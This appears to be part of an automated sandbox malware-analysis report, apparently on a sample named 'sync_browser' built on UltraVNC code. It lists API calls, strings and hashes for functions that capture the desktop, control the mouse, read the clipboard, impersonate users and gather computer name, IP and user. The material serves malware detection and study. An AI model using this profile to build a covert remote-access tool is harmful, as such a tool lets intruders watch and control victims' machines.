GetSystemMetrics.USER32 ref: 00007FF7D595500B
GetSystemMetrics.USER32 ref: 00007FF7D5955027
GetSystemMetrics.USER32 ref: 00007FF7D5955046
GetCursorPos.USER32 ref: 00007FF7D59550B1
SystemParametersInfoA.USER32 ref: 00007FF7D59550D8
SystemParametersInfoA.USER32 ref: 00007FF7D59550EA
SystemParametersInfoA.USER32 ref: 00007FF7D595510E
SystemParametersInfoA.USER32 ref: 00007FF7D5955122
mouse_event.USER32 ref: 00007FF7D5955149
SystemParametersInfoA.USER32 ref: 00007FF7D5955163
SystemParametersInfoA.USER32 ref: 00007FF7D5955175

Strings

vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 246551654-3977938048
Opcode ID: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
Instruction ID: ab93d2d14a02dc7cb7156f4b35cbcda3983abd6d317a924267c77c023b3fd530
Opcode Fuzzy Hash: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
Instruction Fuzzy Hash: 5522C132A086918BF7A4AB25C458BFD7BA1FB85B88FC44036CE4D576A5CF38D554C720

Function 00007FF7D5948590 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 266threadlibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D59485D3
GetProcAddress.KERNEL32 ref: 00007FF7D59485EF
EnumDisplaySettingsA.USER32 ref: 00007FF7D594862B
EnumDisplaySettingsA.USER32 ref: 00007FF7D59486BD
FreeLibrary.KERNEL32 ref: 00007FF7D594874B
GetCurrentThreadId.KERNEL32 ref: 00007FF7D59488B9
GetThreadDesktop.USER32 ref: 00007FF7D59488C1
OpenInputDesktop.USER32 ref: 00007FF7D59488D9
SetThreadDesktop.USER32 ref: 00007FF7D59488EA
ChangeDisplaySettingsExA.USER32 ref: 00007FF7D594890C
ChangeDisplaySettingsExA.USER32 ref: 00007FF7D5948929
SetThreadDesktop.USER32 ref: 00007FF7D5948939
CloseDesktop.USER32 ref: 00007FF7D5948947
FreeLibrary.KERNEL32 ref: 00007FF7D5948950
FreeLibrary.KERNEL32 ref: 00007FF7D5948968

Strings

USER32, xrefs: 00007FF7D59485BC
mv video hook driver2, xrefs: 00007FF7D5948724
DEVICE0, xrefs: 00007FF7D59487C8
mv2, xrefs: 00007FF7D5948836
, xrefs: 00007FF7D5948846
\DEVICE, xrefs: 00007FF7D594879A
EnumDisplayDevicesA, xrefs: 00007FF7D59485E5

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 1729393483-4131161223
Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
Instruction ID: 761c6a55f46dea9aa78c74825876a33fe8fe9b20bd40f0b8f0654516ae91f980
Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
Instruction Fuzzy Hash: 72B1A032A096928BFB64AB24A4506BEB7A0FF85F58FC44036DE1D67684DF3CD905C724

Function 00007FF7D5949740 Relevance: 38.7, APIs: 7, Strings: 15, Instructions: 246libraryloaderCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF7D59497A1
LoadLibraryA.KERNEL32 ref: 00007FF7D59497B6
GetProcAddress.KERNEL32 ref: 00007FF7D59497D2
FreeLibrary.KERNEL32 ref: 00007FF7D5949856
FreeLibrary.KERNEL32 ref: 00007FF7D5949891
CreateDCA.GDI32 ref: 00007FF7D59499F6
DeleteDC.GDI32 ref: 00007FF7D5949A04

Strings

access denied, permission problem, xrefs: 00007FF7D5949A4D
Driver not found: Perhaps you need to reboot after install, xrefs: 00007FF7D5949844
DISPLAY, xrefs: 00007FF7D59499C7
Driver Not Activated, is the viewer current connected ?, xrefs: 00007FF7D5949A90
Driver verion is not 1.00.22 , xrefs: 00007FF7D594991F
EnumDisplayDevicesA, xrefs: 00007FF7D59497C8
Driver version OK , xrefs: 00007FF7D59498EE
driver info: required version 1.00.22, xrefs: 00007FF7D594983D
USER32, xrefs: 00007FF7D59497A7
Is winvnc started with run as admin, no permission to start mirror driver? , xrefs: 00007FF7D5949B03
mv video hook driver2, xrefs: 00007FF7D5949814
access ok, xrefs: 00007FF7D5949A19
1.00.22, xrefs: 00007FF7D59498CF
driver Active, xrefs: 00007FF7D59499BC
mv2.dll, xrefs: 00007FF7D59498AE

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
API String ID: 524771730-2664985301
Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
Instruction ID: ee2adebd8b2bcb8f888a89f03bc532fe0f0914178dbb612bebd06fa525d127b6
Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
Instruction Fuzzy Hash: FCD17135A09B96D6E7189B24A84096D7BA0FF48BA4FC04237DE6D477A0DF3CE521C320

Function 00007FF7D5942E40 Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 95serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00007FF7D5942E5D
OpenServiceA.ADVAPI32 ref: 00007FF7D5942EAD
GetLastError.KERNEL32 ref: 00007FF7D5942EBB
CloseServiceHandle.ADVAPI32 ref: 00007FF7D5942EE0

Part of subcall function 00007FF7D593A040: OpenInputDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A07A
Part of subcall function 00007FF7D593A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7D593A083
Part of subcall function 00007FF7D593A040: GetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A08B
Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0A6
Part of subcall function 00007FF7D593A040: MessageBoxA.USER32 ref: 00007FF7D593A0B7
Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0C2
Part of subcall function 00007FF7D593A040: CloseDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0CB

Strings

Failed to delete the service, xrefs: 00007FF7D5942F7A
uvnc_service, xrefs: 00007FF7D5942E98
UltraVNC, xrefs: 00007FF7D5942E6F, 00007FF7D5942ECA, 00007FF7D5942EF9, 00007FF7D5942F81
Failed to open service control manager, xrefs: 00007FF7D5942E76
Failed to open the service, xrefs: 00007FF7D5942F00
Failed: Permission denied, xrefs: 00007FF7D5942ED1
Failed to query service status, xrefs: 00007FF7D5942F37

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
API String ID: 1921882253-4018834470
Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
Instruction ID: 8a5ee36592aed125f6b4ac4ee7bdc29db2fb47299c753ede7815e1679f5f6da9
Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
Instruction Fuzzy Hash: E4412C21A1861387FA58BB65A814ABDA7A1BF89F48FC41077DD0E472A4DF3CE9458730

Function 00007FF7D5931AE0 Relevance: 36.2, APIs: 24, Instructions: 196clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF7D5931B0B
IsClipboardFormatAvailable.USER32 ref: 00007FF7D5931B67
GetClipboardData.USER32 ref: 00007FF7D5931B79
GlobalLock.KERNEL32 ref: 00007FF7D5931B8E
GlobalSize.KERNEL32 ref: 00007FF7D5931B9A
WideCharToMultiByte.KERNEL32 ref: 00007FF7D5931BD3
WideCharToMultiByte.KERNEL32 ref: 00007FF7D5931C0D
GlobalUnlock.KERNEL32 ref: 00007FF7D5931C38
IsClipboardFormatAvailable.USER32 ref: 00007FF7D5931C48
GetClipboardData.USER32 ref: 00007FF7D5931C58
GlobalLock.KERNEL32 ref: 00007FF7D5931C69
GlobalSize.KERNEL32 ref: 00007FF7D5931C75
GlobalUnlock.KERNEL32 ref: 00007FF7D5931CAA

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
String ID:
API String ID: 1939172783-0
Opcode ID: b74a740e7d7a84ef91a39c9c6b0aed0404e7093e028a8cc676548e38d4108882
Instruction ID: 5baf08e71fd12fa4c0ed077f9ae0b9ef0f3f90957bc78cee0fc26fa1add20b29
Opcode Fuzzy Hash: b74a740e7d7a84ef91a39c9c6b0aed0404e7093e028a8cc676548e38d4108882
Instruction Fuzzy Hash: 78819E21A09B568BE658BF26A91057DB7A0FF85F84BC4413ADE5E477A4DF3CE021D310

Function 00007FF7D593A910 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 122COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF7D593A93D
GetLastError.KERNEL32 ref: 00007FF7D593A947
SystemParametersInfoA.USER32 ref: 00007FF7D593A9AB
GetLastError.KERNEL32 ref: 00007FF7D593A9B5
SystemParametersInfoA.USER32 ref: 00007FF7D593AA16
GetLastError.KERNEL32 ref: 00007FF7D593AA20
SystemParametersInfoA.USER32 ref: 00007FF7D593AAB1
GetLastError.KERNEL32 ref: 00007FF7D593AABB
SystemParametersInfoA.USER32 ref: 00007FF7D593AB0D
GetLastError.KERNEL32 ref: 00007FF7D593AB17

Strings

HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF7D593AA4D
HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF7D593A9E6
HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF7D593A9BB
HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF7D593AA26
HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF7D593AAE1
HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF7D593AB1D
HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF7D593A94D
HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF7D593AB3F
HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF7D593AAC1
HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF7D593A97B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
API String ID: 2777246624-1480653996
Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
Instruction ID: 1618950c009454188104730eb5f46315f9b153985a8866473eb850ba312f30db
Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
Instruction Fuzzy Hash: 3E511B60A185A787F718BBA4A900FBDAF91AF90B48FC44033CC0D975A5DE3D6509C371

Function 00007FF7D595C2C0 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D595C326
LeaveCriticalSection.KERNEL32 ref: 00007FF7D595C33B
LeaveCriticalSection.KERNEL32 ref: 00007FF7D595C356

Strings

vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF7D595C455
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF7D595C3DC
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF7D595C2F4
g, xrefs: 00007FF7D595C31B
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF7D595C43D
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF7D595C3A7
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF7D595C37E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter
String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
API String ID: 2978645861-1267036565
Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
Instruction ID: f31fc3ebfae619ddeef77aa424339b14385909c45da0c48f3aee7f5bd0097d70
Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
Instruction Fuzzy Hash: BB516E22A1869286F615BF25A804AFDABA1FF89F98FC41033DD4E47294DF3DE115C760

Function 00007FF7D5958A70 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59E92A4: malloc.LIBCMT ref: 00007FF7D59E92C7

CreateRectRgn.GDI32 ref: 00007FF7D5958BF6
CreateRectRgn.GDI32 ref: 00007FF7D5958C73
SetRectRgn.GDI32 ref: 00007FF7D5958C91
CombineRgn.GDI32 ref: 00007FF7D5958CA8
DeleteObject.GDI32 ref: 00007FF7D5958CB1
EnterCriticalSection.KERNEL32 ref: 00007FF7D5958D26
CombineRgn.GDI32 ref: 00007FF7D5958D42
SetEvent.KERNEL32 ref: 00007FF7D5958D73
SetEvent.KERNEL32 ref: 00007FF7D5958DA5
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5958DB7
DeleteObject.GDI32 ref: 00007FF7D5958DC3
free.LIBCMT ref: 00007FF7D5958CBA

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

GetRgnBox.GDI32 ref: 00007FF7D5958CCC
DeleteObject.GDI32 ref: 00007FF7D5958CF2
free.LIBCMT ref: 00007FF7D5958CFD
free.LIBCMT ref: 00007FF7D5958DCE

Strings

vncclient.cpp : FATAL! client update region is empty!, xrefs: 00007FF7D5958CD7
\, xrefs: 00007FF7D5958D1B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
String ID: \$vncclient.cpp : FATAL! client update region is empty!
API String ID: 1264956880-3227535004
Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
Instruction ID: 4a283a3d8bc2c822c99274a5ea7573645aa9bfa1f50643d7e391d9845ec4fce6
Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
Instruction Fuzzy Hash: A2A1D6326146A58AD744EF1AE444A6EBBA8FBC9F94F814036EE4D43754CF3DD805CB10

Function 00007FF7D5937A1C Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF7D5937C5B

Part of subcall function 00007FF7D59E7C50: _errno.LIBCMT ref: 00007FF7D59E7C88
Part of subcall function 00007FF7D59E7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7C93

sprintf.LIBCMT ref: 00007FF7D5937CC6
sprintf.LIBCMT ref: 00007FF7D5937D04
sprintf.LIBCMT ref: 00007FF7D5937D68
GetUserNameA.ADVAPI32 ref: 00007FF7D5937E9C

Strings

ComputerName : , xrefs: 00007FF7D5937F2C
, (MSIL Processor), xrefs: 00007FF7D5937A2B
Service Pack: 6a, xrefs: 00007FF7D5937D5D
IP : , xrefs: 00007FF7D5937FB9
Current user : , xrefs: 00007FF7D5937EA6
%02d, xrefs: 00007FF7D5937CB3
Build:%d, xrefs: 00007FF7D5937CF9
v%d., xrefs: 00007FF7D5937C50

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
